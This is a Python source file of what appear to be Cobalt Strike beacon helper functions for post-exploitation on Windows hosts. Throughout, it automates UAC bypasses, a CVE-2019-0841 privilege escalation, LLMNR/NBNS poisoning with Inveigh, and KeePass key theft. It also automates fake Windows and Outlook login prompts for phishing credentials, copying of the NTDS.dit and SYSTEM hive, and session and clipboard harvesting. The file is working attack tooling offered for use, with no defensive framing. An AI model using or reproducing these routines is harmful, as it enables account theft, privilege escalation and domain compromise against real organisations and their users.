def elevate_token_shellcode_csharp(bid, shellcode):
"""
Elevate with token duplication bypass. Execute `shellcode` with a C# helper.
"""
aggressor.bpowershell_import(
bid, utils.basedir('modules/FilelessUACBypass.ps1'))
execute_shellcode = utils.basedir('tools/execute_shellcode.exe')
execute_assembly = utils.basedir('tools/execute_assembly.exe')
stage1 = r'{}\NugetPackage.exe'.format(helpers.guess_temp(bid))
#stage2 = r'{}\nuget_update.package'.format(helpers.guess_temp(bid))
stage2 = r'{}\Stage2.exe'.format(helpers.guess_temp(bid))
package = r'{}\nuget.package'.format(helpers.guess_temp(bid))
helpers.upload_to(bid, execute_assembly, stage1)
helpers.upload_to(bid, execute_shellcode, stage2)
helpers.upload_to(bid, shellcode, package)
command = 'Invoke-TokenDuplication -Binary {}'.format(
powershell_quote(stage2))
aggressor.bpowerpick(bid, command)
aggressor.brm(bid, stage1)
aggressor.brm(bid, stage2)
aggressor.brm(bid, package)
def run(bid, program, args=None, silent=False):
# no args
if not args:
args = []
if program in assemblies:
assembly = assemblies[program]
args = helpers.eaq(args)
if not silent:
aggressor.btask(bid,
'Tasked beacon to run {} {}'.format(program, args))
aggressor.bexecute_assembly(bid, assembly, args, silent=True)
elif program in powershell:
script = powershell[program]
aggressor.bpowershell_import(bid, script)
if isinstance(args, list) or isinstance(args, tuple):
args = ' '.join(powershell_quote(args))
aggressor.bpowerpick(bid, ' '.join(args))
elif program in callbacks:
callback = callbacks[program]
callback(bid, args, silent=silent)
else:
raise RuntimeError('Unrecognized program: {}'.format(program))
def import_network_recon(bid):
"""
Import NetworkRecon.ps1
"""
aggressor.bpowershell_import(bid,
utils.basedir('powershell/NetworkRecon.ps1'))
def import_domain_recon(bid):
"""
Import DomainRecon.ps1
"""
aggressor.bpowershell_import(bid,
utils.basedir('powershell/DomainRecon.ps1'))
def _(bid, runtime=99999, *args):
aggressor.bpowershell_import(
bid, utils.basedir('powershell/Inveigh/Inveigh.ps1'))
aggressor.bpowerpick(
bid,
"Invoke-Inveigh -ConsoleOutput N -RunTime {} -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y {}"
.format(runtime, ' '.join(args)))
def elevate_slui_command(bid, command):
"""
Elevate with slui bypass.
"""
aggressor.bpowershell_import(
bid, utils.basedir('modules/FilelessUACBypass.ps1'))
aggressor.bpowerpick(
bid, 'Invoke-SluiBypass -Command {}'.format(powershell_quote(command)))
def _(bid):
# KeePassConfig
aggressor.bpowershell_import(bid,
utils.basedir('powershell/KeePassconfig.ps1'))
aggressor.bpowerpick(bid, "Find-KeePassconfig")
# KeeThief
aggressor.bpowershell_import(bid, utils.basedir('powershell/KeeThief.ps1'))
aggressor.bpowerpick(bid, "Get-KeePassDatabaseKey -Verbose")
def elevate_eventvwr_command(bid, command):
"""
Elevate with eventvwr bypass.
"""
aggressor.bpowershell_import(
bid, utils.basedir('modules/Invoke-EventVwrBypass.ps1'))
aggressor.bpowerpick(
bid,
'Invoke-EventVwrBypass -Command {}'.format(powershell_quote(command)))
def elevate_wscript_command(bid, command):
"""
Elevate with wscript bypass.
"""
aggressor.bpowershell_import(
bid, utils.basedir('modules/Invoke-WScriptBypassUAC.ps1'))
aggressor.bpowerpick(
bid, 'Invoke-WScriptBypassUAC -payload {}'.format(
powershell_quote(command)))
def _(bid, out=None):
aggressor.bpowershell_import(bid, utils.basedir('powershell/UserSPN.ps1'))
command = 'Get-AccountSPNs'
if out:
# output to file
command += ' > {}'.format(powershell_quote(out))
aggressor.bpowerpick(bid, command)
def elevate_cve_2019_0841(bid, target, overwrite=None):
r"""
Elevate with CVE-2019-0841. Change permissions of 'target'. Optionally
overwrite 'target' with 'overwrite'.
Good overwrite options:
- C:\Program Files\LAPS\CSE\AdmPwd.dll (then run gpupdate)
- C:\Program Files (x86)\Google\Update\1.3.34.7\psmachine.dll (then wait for google update or run it manually)
"""
native_hardlink_ps1 = utils.basedir('powershell/Native-HardLink.ps1')
edge_dir = r'$env:localappdata\Packages\Microsoft.MicrosoftEdge_*'
settings_dat = r'\Settings\settings.dat'
command = helpers.code_string(r"""
# Stop Edge
echo "[.] Stopping Edge"
$process = Get-Process -Name MicrosoftEdge 2>$null
if ($process) {{
$process | Stop-Process
}}
sleep 3
# Hardlink
$edge_dir = Resolve-Path {edge_dir}
$settings_dat = $edge_dir.Path + '{settings_dat}'
echo "[.] Making Hardlink from $settings_dat to {target}"
rm $settings_dat
Native-HardLink -Verbose -Link $settings_dat -Target {target}
# Start Edge
echo "[.] Starting Edge"
Start Microsoft-Edge:
sleep 3
# Stop it again
echo "[.] Stopping Edge"
$process = Get-Process -Name MicrosoftEdge 2>$null
if ($process) {{
$process | Stop-Process
}}
echo "[+] All Finished!"
echo "[.] New ACLs:"
Get-Acl {target} | Format-List
""".format(edge_dir=edge_dir,
settings_dat=settings_dat,
target=powershell_quote(target)))
aggressor.bpowershell_import(bid, native_hardlink_ps1, silent=True)
aggressor.bpowerpick(bid, command, silent=True)
if overwrite:
helpers.upload_to(bid, overwrite, target)
helpers.explorer_stomp(bid, target)
def _(bid, *ranges):
aggressor.bpowershell_import(
bid,
utils.basedir(
'powershell/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1'))
command = ''
for r in ranges:
command += 'Invoke-ReverseDnsLookup {}\n'.format(r)
aggressor.bpowerpick(bid, command)
def _(bid, runtime=99999, *args):
aggressor.bpowershell_import(
bid, utils.basedir('powershell/Inveigh/Inveigh.ps1'))
aggressor.btask(
bid,
'Tasked beacon to run inveigh with output files at %userprofile%\\AppData\\Roaming\\Microsoft'
)
aggressor.bpowerpick(
bid,
r"Invoke-Inveigh -FileOutput Y -FileOutputDirectory $env:userprofile\AppData\Roaming\Microsoft -RunTime {} -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y {}"
.format(runtime, ' '.join(args)))
def _(bid,
title='Windows Security',
message='Please re-enter your user credentials.'):
aggressor.bpowershell_import(
bid, utils.basedir('powershell/Invoke-LoginPrompt.ps1'))
command += helpers.code_string(r"""
$out = ShowPrompt "{}" "{}"
if ($out) {{
$out
}} else {{
echo "Didn't get the credentials"
}}
""".format(title, message))
# powerpick doesn't work with $host.ui
aggressor.bpowershell(bid, command, silent=True)
def _(bid):
ntds_source = r'C:\Windows\ntds\ntds.dit'
system_source = r'C:\Windows\system32\config\SYSTEM'
ntds_dest = r'C:\Windows\temp\ntds.dit'
system_dest = r'C:\Windows\temp\SYSTEM'
aggressor.bpowershell_import(
bid,
utils.basedir(
'powershell/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1'))
command = helpers.code_string(r"""
Invoke-NinjaCopy -Path "{}" -LocalDestination "{}"
Invoke-NinjaCopy -Path "{}" -LocalDestination "{}"
""".format(ntds_source, ntds_dest, system_source, system_dest))
aggressor.bpowerpick(bid, command)
aggressor.blog2(
bid, 'Files will be at "{}" and "{}"'.format(ntds_dest, system_dest))
def elevate_token_command(bid, command, *other_args):
"""
Elevate with token duplication bypass. Execute `command` with `arguments`.
"""
command, *arguments = command.split()
aggressor.bpowershell_import(
bid, utils.basedir('modules/FilelessUACBypass.ps1'))
powershell = 'Invoke-TokenDuplication -Binary {} '.format(
powershell_quote(command))
if arguments:
powershell += '-Arguments {} '.format(
powershell_quote(' '.join(arguments)))
if other_args:
powershell += ' '.join(other_args)
aggressor.bpowerpick(bid, powershell)
def _(
bid,
title='Microsoft Outlook',
message='Your Outlook session has expired. Please re-enter your credentials.'
):
aggressor.bpowershell_import(
bid, utils.basedir('powershell/Invoke-LoginPrompt.ps1'))
command = helpers.code_string(r"""
Stop-Process -Name OUTLOOK
$out = ShowPrompt "{}" "{}"
if ($out) {{
$out
Start-Process outlook
}} else {{
echo "Didn't get the credentials"
}}
""".format(title, message))
# powerpick doesn't work with $host.ui
aggressor.bpowershell(bid, command, silent=True)
def _(bid):
aggressor.bpowershell_import(
bid, utils.basedir('powershell/Inveigh/Inveigh.ps1'))
aggressor.bpowerpick(bid, 'Stop-Inveigh')
def _(bid):
aggressor.bpowershell_import(
bid, utils.basedir("powershell/Invoke-mimikittenz.ps1"))
aggressor.bpowerpick(bid, "Invoke-mimikittenz")
def _(bid, *args):
aggressor.bpowershell_import(bid, utils.basedir('powershell/Start-ClipboardMonitor.ps1'))
aggressor.bpowerpick(bid, 'Start-ClipboardMonitor {}'.format(' '.join(powershell_quote(args))))
def import_host_recon(bid):
"""
Import HostRecon.ps1
"""
aggressor.bpowershell_import(bid, utils.basedir('powershell/HostRecon.ps1'))
def import_script(bid, program):
if program in powershell:
script = powershell[program]
aggressor.bpowershell_import(bid, script)
else:
raise RuntimeError('Not a known script: {}'.format(program))
def _(bid):
aggressor.bpowershell_import(
bid, utils.basedir('powershell/Invoke-CredLeak.ps1'))
aggressor.bpowerpick(bid, 'Invoke-CredLeak')
def _(bid, *args):
aggressor.bpowershell_import(bid,
utils.basedir('powershell/SessionGopher.ps1'))
aggressor.bpowerpick(
bid, 'Invoke-SessionGopher ' + ' '.join(powershell_quote(args)))
def import_av_logs(bid):
"""
Import AVLogs.ps1
"""
aggressor.bpowershell_import(bid, utils.basedir('powershell/AVLogs.ps1'))
def _(bid, *args):
aggressor.bpowershell_import(
bid, utils.basedir('powershell/Invoke-NetRipper.ps1'))
aggressor.bpowerpick(
bid, r'Invoke-NetRipper -LogLocation C:\Temp\ ' +
' '.join(powershell_quote(args)))
